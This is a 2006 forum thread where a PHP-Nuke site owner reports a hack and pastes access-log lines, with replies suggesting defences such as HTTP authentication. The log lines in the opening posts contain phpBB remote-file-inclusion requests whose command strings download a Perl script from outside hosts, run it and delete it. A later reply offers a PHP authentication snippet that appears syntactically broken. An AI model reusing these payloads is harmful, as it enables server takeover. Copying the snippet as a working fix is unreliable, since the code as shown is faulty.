Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x
Author Message
panda
Hangin' Around


Joined: May 09, 2004
Posts: 32

PostPosted: Tue Aug 29, 2006 3:48 am Reply with quote

My site got hacked 2 days ago all posts were deleted on the forums so uploaded a DB backup and again same time yesterday post starting been deleting then they removed blocks and other stuff. The IP of the guy who was using my login details and admin were 80.193.176.196 !!

After checking my logs the only thing which was standing out at the time was this >>

222.124.193.3 - - [17/Aug/2006:17:28:56 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.osmozcafe.com/agenda/admin/backup/b.txt?&cmd HTTP/1.0" 200 364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Then after spending a good 1hr looking through 60k Lines !! I found this >>

217.73.200.24 - - [09/Aug/2006:18:35:20 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=www.undergroundhiphop.com/cmd.txt?&cmd=cd%20/tmp/;curl%20-O%20www.undergroundhiphop.com/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"


200 lines of these types of strings with different URL’s all the below IP addresses are the ones who were doing it over the space of this last month.


87.106.15.181
86.203.4.132
85.90.137.142
85.17.48.90
83.217.84.73
83.166.193.241
83.149.71.73
82.207.114.11
82.138.17.101
81.24.17.133
80.96.166.154
80.202.56.4
66.94.82.111
66.42.206.202
64.34.5.10
64.240.166.241
62.253.128.15
61.19.55.250
222.124.193.3
217.73.200.24
217.24.244.133
217.20.127.17
217.12.49.1
216.75.30.69
216.32.68.234
213.167.155.32
212.98.165.220
212.91.134.133
212.138.47.20
212.138.47.15
212.138.113.23
211.21.63.47
211.75.219.154
210.87.251.111
210.87.251.107
210.87.251.106
203.146.102.59
203.113.132.116
202.85.42.140
194.44.12.3
194.105.26.26
193.91.75.11
193.110.186.240
163.32.230.2
140.130.101.32
128.42.61.59
222.124.193.3



So Should Sentinel pick these up ? Because it's not.

I'm on normal 7.7 Nuke and 2.0.21 forums.

Thanks

Andy
 
View user's profile Send private message
manunkind
Client


Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

PostPosted: Tue Aug 29, 2006 5:37 am Reply with quote

That's good information, thanks.

So the main difference is that it's missing the "http://". Maybe that's what NS looks for and why it's slipping through?

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
panda
PostPosted: Tue Aug 29, 2006 5:42 am Reply with quote

Good point, but i've just checked my logs again an there is ones with Only registered users can see links on this board! Get registered or login! in them !!

202.85.42.140 - - [10/Aug/2006:16:03:30 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://bardock.netfast.org/tool25.png?&cmd=cd%20/tmp/;wget%20http://www.tamashisound.it/httpds/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"
203.146.102.59 - - [10/Aug/2006:16:03:35 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.tamashisound.it/httpds/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.tamashisound.it/httpds/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"
212.138.47.20 - - [16/Aug/2006:02:35:28 +0100] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.sale-ostrava.cz/tmp/httpd/cmd.txt?&cmd=cd%20/tmp/;lwp-download%20http://www.sale-ostrava.cz/tmp/httpd/phpnuke2.txt;perl%20phpnuke2.txt;rm%20-rf%20phpnuke2.*? HTTP/1.0" 200 27 "-" "Mozilla/5.0"

Thanks

Andy
 
manunkind
PostPosted: Tue Aug 29, 2006 5:48 am Reply with quote

Hmmm ok. Well the experts/developers will be along soon and hopefully will shed some light on this. What version of NS are you running?
 
panda
PostPosted: Tue Aug 29, 2006 5:52 am Reply with quote

NukeSentinel v2.5.0, Just seen the update to 2.5.1 but there is nothing in there to do with this type of hack attempts.

Thanks

Andy
 
manunkind
PostPosted: Tue Aug 29, 2006 5:53 am Reply with quote

It's looking like the string "*.txt*" would be a good thing to block as well. There's at least some uniformity in all these hacks.
 
panda
PostPosted: Tue Aug 29, 2006 5:55 am Reply with quote

Yep, a few redirects goto .png & .gifs first as well then on to the txt file, if you check the first txt file
Only registered users can see links on this board! Get registered or login!

You'll see all the code of one of them. ( Not sure if i can point this out at all on these forums or not, Delete if not )

Thanks

Andy
 
panda
PostPosted: Tue Aug 29, 2006 6:35 am Reply with quote

Just to add to this and for a bit of help, how do you create a password on this topic here
Only registered users can see links on this board! Get registered or login!

everything works pop window comes up to put username and password in, but not sure how to create a working password.

Thanks

Andy
 
oprime2001
Worker
Worker


Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA

PostPosted: Tue Aug 29, 2006 7:45 am Reply with quote

Is this hack invisible to NukeSentinel because neither mainfile.php nor modules.php are called/invoked? Just guessing on my part, though.
 
View user's profile Send private message
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Tue Aug 29, 2006 10:10 am Reply with quote

This exploit was hitting a bunch of sites a few months ago and was the reason for Raven's post that was given above by Panda.

If you want something quick-and-dirty, just use your same .staccess file from NukeSentinel to protect the forums. If you are not using CGIAuth for NS, then you'll have to generate the password using the crypt() function per the referenced thread from Raven's post.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
oprime2001
PostPosted: Tue Aug 29, 2006 10:27 am Reply with quote

According to this Only registered users can see links on this board! Get registered or login!, this vulnerability dates back to 2005-05-05, or has been patched but re-introduced. Regardless, it still seems that NukeSentinel does NOT detect these exploits.
 
panda
PostPosted: Tue Aug 29, 2006 11:37 am Reply with quote

All I can say is someone got into my site and used my logins and deleted all my forums posts then started deleting blocks and changing stuff. And all I can see on my logs is loads of those strings.

Then over the last few days a unknown IP started using my login details, and my passwords are not easy to remember and I don’t give out any of my stuff to no one not even my Wife !!

Andy.
 
montego
PostPosted: Tue Aug 29, 2006 11:43 am Reply with quote

No one is questioning whether you got hacked or not. You need to apply the password protection mentioned above and after you have done that, change all your nuke and account passwords just to be on the safe side.

If your host using cpanel, you may even be able to apply a password on the modules/Forums/admin directory that way. I have done this successfully on at least one site.
 
panda
PostPosted: Tue Aug 29, 2006 11:50 am Reply with quote

Sorry that wasn't a Rant.

Just me saying i think this is how they got in !! Cause nothing else is standing out to me and i don't know what you can do if you run that hack on someones site Admin wise.

I have changed all my passwords and setup the HTTP Authentication now so we'll see what happens.

Thanks

Andy
 
montego
PostPosted: Tue Aug 29, 2006 4:43 pm Reply with quote

That should stop them in their tracks.... (for any and all Forum/admin file exploits).
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Wed Aug 30, 2006 5:04 am Reply with quote

.txt doesn't matter - it could be named anything, though the unimaginative script kiddies are capable of much thought beyond how to copy someone else's attack script.

I'd request from the webhost that the offending site by taken down. Send a copy of your log message to the host with something along the lines of the script violating the terms of service.

As evaders pointed out, those files work outside the scope of NukeSentinel, so NukeSentinel can't stop it. However, using admin authentication, as montego pointed out, stops it quite effectively.

A quick and dirty approach is to simply rename your modules/Forums/admin directory, but you won't be able to adminster the Forums without changing it back.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
manunkind
PostPosted: Wed Aug 30, 2006 5:35 am Reply with quote

kguske wrote:
A quick and dirty approach is to simply rename your modules/Forums/admin directory, but you won't be able to adminster the Forums without changing it back.


As often as we really need to go in there, that might not be a bad idea. It only takes a second or two to rename it back.
 
kguske
PostPosted: Wed Aug 30, 2006 5:39 am Reply with quote

Keep in mind that a spider can still read the directory and find the new name, even though that's beyond what most script kiddies are capable of... The best approach is admin authentication.
 
oprime2001
PostPosted: Wed Aug 30, 2006 5:53 am Reply with quote

I understand that the admin auth and renaming folders will help to prevent these type of attacks. But is the real problem/exploit being remediated? Is this a phpBB issue, php-nuke issue, php issue or server issue? To whom should we look to for an actual patch of this vulnerability? Does (or will) the "Patched-series" fix this particular exploit?
 
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

PostPosted: Wed Aug 30, 2006 6:42 am Reply with quote

Here's another option - it will only protect access to the forum admin file itself.
I have NOT tested it, so use at your own risk but it should work.
In config.php add
Code:


$admin_user_name = 'yourusername';
$admin_user_pass = 'youradminpassword';
define('FORUM_PASS_AREA',True);

Make sure both of these do NOT match any exisiting usernames/passwords you are using.

In the forum admin file immediately below the copyright messages type in
Code:


while (!isset($_SERVER["PHP_AUTH_USER"])) {
   header("WWW-Authenticate: Basic realm=\"Forum Admin Area\"");
   header("HTTP/1.0 401 Unauthorized");
   echo "<h1>401 Unauthorized</h1><br />";
   echo "Try a little harder";
   exit();
}
if ($_SERVER["PHP_AUTH_USER"] == $admin_user_name && $_SERVER["PHP_AUTH_PW"] == $admin_user_pass && if (defined('FORUM_PASS_AREA')) {

Just before the php closing tag at the end of the file add on a new line
Code:
}


Last edited by Guardian2003 on Wed Aug 30, 2006 11:56 am; edited 2 times in total 
View user's profile Send private message Send e-mail
kguske
PostPosted: Wed Aug 30, 2006 7:56 am Reply with quote

oprime2001, to answer your questions:
But is the real problem/exploit being remediated? Yes, on several fronts.
Is this a phpBB issue, php-nuke issue, php issue or server issue? phpBB
To whom should we look to for an actual patch of this vulnerability? Bob Marion is trying to address it with NukeSentinel (latest versions may impact it), Raven addressed it with admin authentication, phpBB may address it, and NukeFixes may address it.
Does (or will) the "Patched-series" fix this particular exploit? Not sure if it's included yet, maybe Evaders can address this one.
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Aug 30, 2006 11:48 am Reply with quote

As of yet, I have not confirmed this vulnerability with the latest Patched files. The code looks right, and I cannot exploit it on my own system with Patched + 2.0.21 files...

If I could get immediate access to system that is Patched + 2.0.21 and still vulnerable, I would look into it ASAP. It may be something different in the system configurations... I'm just not sure.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©